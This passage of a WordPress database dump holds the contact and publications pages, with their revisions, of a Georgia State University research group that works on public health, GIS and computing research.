align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-400 style-local-185-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-400 style-local-185-c5\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Contact Us</h2>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c6\" class=\"h-text h-text-component style-401 style-local-185-c6 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus.&nbsp;</p>\n                    <p>Phone:&nbsp;(404) 919-0757\n                      <br>Email: dice@cs.gsu.edu</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c7-outer\">\n            <div data-colibri-id=\"185-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-18 20:52:17','2022-03-19 00:52:17','',185,'https://gsudice.dataconn.net/?p=603',0,'revision','',0),(608,1,'2022-03-19 12:00:08','2022-03-19 16:00:08','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n            <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2024</strong></p>\n                    <p>Fariba Afrin Irany, Sundos Al Subhi, Rubenia Borge Flores, Chetan Tiwari. Algorithms to Reduce Biases in Disease Rate Estimates Caused by Data Suppression. <em>IAENG International Journal of Applied Mathematics</em>, 2024, 54 (5),\n                      pp.16.</p>\n                    <p>Ramisetty-Mikler, S., Willis, A. &amp; Tiwari, C. Pre-pregnancy Weight&nbsp;and Racial-Ethnic Disparities in Pregnancy-Associated Conditions in the State of Georgia: A Population-Based Study. <em>J. Racial and Ethnic Health Disparities</em>                      (2024).</p>\n                    <p>S. N. S. Al Subhi, A. R. Mikler and M. M. Kubek, Constructing Co-Occurrence Graphs and Deriving Flood Ontologies for Enhanced Understanding, <em>2024 Second International Conference on Inventive Computing and Informatics (ICICI)</em>,\n                      Bangalore, India.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p><strong>2023</strong></p>\n                    <p>Mubashir, A., Ashok, A., Bourgeois, A. G., Chien, Y. T., Connors, M., Potdevin, E., et&nbsp;al. (2023). Muon flux variations measured by low-cost portable cosmic ray detectors and their correlation with space weather activity. <em>Journal of Geophysical Research: Space Physics</em>,\n                      128, e2023JA031943.</p>\n                    <p>McDaniel EL, Akwafuo S, Urbanovsky J, Mikler AR.2023. Benchmarking a fast, satisficing vehicle routing algorithm for public health emergency planning and response: “Good Enough for Jazz”. PeerJ Computer Science</p>\n                    <p>Gwalani, H., Tiwari, C., O’Neill II, M. <em>et al.</em> Creating contiguous service areas around points of dispensing for resource distribution during bio-emergencies. <em>Geoinformatica.</em></p>\n                    <p>Arfa Mubashir, Xiaochun He, Ashwin Ashok, et al. Muon Flux Variation in Real-time and its Correlation with Space Weather Activity. <em> ESS Open Archive .</em> February 27, 2023.</p>\n                    <p>Daniel Gebregiorgis, Lawrence Morara Kiage, Chetan Tiwari, Suhasini Ramisetty-Mikler, Aster Gebrekirstos, Asfawossen Asrat, Susan Wanjiru, Emiru Birhane. A multi-disciplinary framework to combat climate-induced desert locus breeding,\n                      upsurges and outbreaks in eastern Africa. AGU Fall Meeting Abstracts, 2023\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p><strong>2022</strong></p>\n                    <p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n                    <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and&nbsp;Community Level Factors Related to Sanitation, Water Quality, Treatment\n                      and Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\n                    <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n                      American Association of Geographers, Annual Meeting 2022.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p><strong>2021</strong></p>\n                    <p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.</p>\n                    <p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n                    <p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n                    <p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n                    <p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n                    <p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n                    <p>O’Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n                    <p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n                    <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n                    <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n                    <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n                      (pp. 1-6). IEEE.</p>\n                    <p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n                      (pp. 631-640). IEEE.</p>\n                    <p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n                      (pp. 505-506).</p>\n                    <p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n                    <p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n                      (S3) Workshop (pp. 1-2).</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n                    <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n                    <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted\n                      Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n                      Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Publications','','publish','closed','closed','','publications','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',126,'https://gsudice.dataconn.net/?page_id=608',0,'page','',0),(610,1,'2022-03-19 12:00:08','2022-03-19 16:00:08','','Publications','','inherit','closed','closed','','608-revision-v1','','','2022-03-19 12:00:08','2022-03-19 16:00:08','',608,'https://gsudice.dataconn.net/?p=610',0,'revision','',0),(612,1,'2022-03-19 12:02:31','2022-03-19 16:02:31','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2024<\\/strong><\\/p><p>Fariba Afrin Irany, Sundos Al Subhi, Rubenia Borge Flores, Chetan Tiwari. Algorithms to Reduce Biases in Disease Rate Estimates Caused by Data Suppression. <em>IAENG International Journal of Applied Mathematics<\\/em>, 2024, 54 (5), pp.16.<\\/p><p>Ramisetty-Mikler, S., Willis, A. &amp; Tiwari, C. Pre-pregnancy Weight&nbsp;and Racial-Ethnic Disparities in Pregnancy-Associated Conditions in the State of Georgia: A Population-Based Study. <em>J. Racial and Ethnic Health Disparities<\\/em> (2024).<\\/p><p>S. N. S. Al Subhi, A. R. Mikler and M. M. Kubek, Constructing Co-Occurrence Graphs and Deriving Flood Ontologies for Enhanced Understanding, <em>2024 Second International Conference on Inventive Computing and Informatics (ICICI)<\\/em>, Bangalore, India.<\\/p><p><br><\\/p><p><strong>2023<\\/strong><\\/p><p>Mubashir, A., Ashok, A., Bourgeois, A. G., Chien, Y. T., Connors, M., Potdevin, E., et&nbsp;al. (2023). Muon flux variations measured by low-cost portable cosmic ray detectors and their correlation with space weather activity. <em>Journal of Geophysical Research: Space Physics<\\/em>, 128, e2023JA031943.<\\/p><p>McDaniel EL, Akwafuo S, Urbanovsky J, Mikler AR.2023. Benchmarking a fast, satisficing vehicle routing algorithm for public health emergency planning and response: \\u201cGood Enough for Jazz\\u201d. PeerJ Computer Science<\\/p><p>Gwalani, H., Tiwari, C., O\\u2019Neill II, M. <em>et al.<\\/em> Creating contiguous service areas around points of dispensing for resource distribution during bio-emergencies. <em>Geoinformatica.<\\/em><\\/p><p>Arfa Mubashir, Xiaochun He, Ashwin Ashok, et al. Muon Flux Variation in Real-time and its Correlation with Space Weather Activity. <em> ESS Open Archive .<\\/em> February 27, 2023.<\\/p><p>Daniel Gebregiorgis, Lawrence Morara Kiage, Chetan Tiwari, Suhasini Ramisetty-Mikler, Aster Gebrekirstos, Asfawossen Asrat, Susan Wanjiru, Emiru Birhane. A multi-disciplinary framework to combat climate-induced desert locus breeding, upsurges and outbreaks in eastern Africa. AGU Fall Meeting Abstracts, 2023<br><\\/p><p><br><\\/p><p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and&nbsp;Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','publish','closed','closed','','612','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=612',0,'extb_post_json','',0),(613,1,'2022-03-19 12:02:31','2022-03-19 16:02:31','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"608-c5\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c5 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"608-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c7-outer\">\n            <div data-colibri-id=\"608-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"608-c8\" class=\"h-text h-text-component style-420 style-local-608-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2022</strong></p>\n                    <p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n                    <p><strong>2021</strong></p>\n                    <p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.</p>\n                    <p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n                    <p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n                    <p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n                    <p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n                    <p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n                    <p>O’Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n                    <p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n                    <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n                    <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n                    <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n                      (pp. 1-6). IEEE.</p>\n                    <p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n                      (pp. 631-640). IEEE.</p>\n                    <p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n                      (pp. 505-506).</p>\n                    <p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n                    <p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n                      (S3) Workshop (pp. 1-2).</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n                    <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n                    <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted\n                      Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n                      Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2022-03-19 12:02:31','2022-03-19 16:02:31','',608,'https://gsudice.dataconn.net/?p=613',0,'revision','',0),(619,1,'2023-09-29 11:36:36','2022-03-19 16:03:38',' ','','','publish','closed','closed','','619','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',126,'https://gsudice.dataconn.net/?p=619',3,'nav_menu_item','',0),(628,1,'2022-03-19 12:07:46','2022-03-19 16:07:46','','headshot','','inherit','open','closed','','headshot','','','2022-03-19 12:07:46','2022-03-19 16:07:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/headshot.jpg',0,'attachment','image/jpeg',0),(629,1,'2022-03-19 12:08:16','2022-03-19 16:08:16','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg','cropped-headshot.jpg','','inherit','open','closed','','cropped-headshot-jpg','','','2023-10-03 15:59:54','2023-10-03 19:59:54','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg',0,'attachment','image/jpeg',0),(630,1,'2022-03-19 12:09:48','2022-03-19 16:09:48','','SRM-360x360','','inherit','open','closed','','srm-360x360','','','2022-03-19 12:09:48','2022-03-19 16:09:48','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/SRM-360x360-1.png',0,'attachment','image/png',0),(689,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','Armin-Mikler_300x300','','inherit','open','closed','','armin-mikler_300x300','','','2022-03-23 10:37:14','2022-03-23 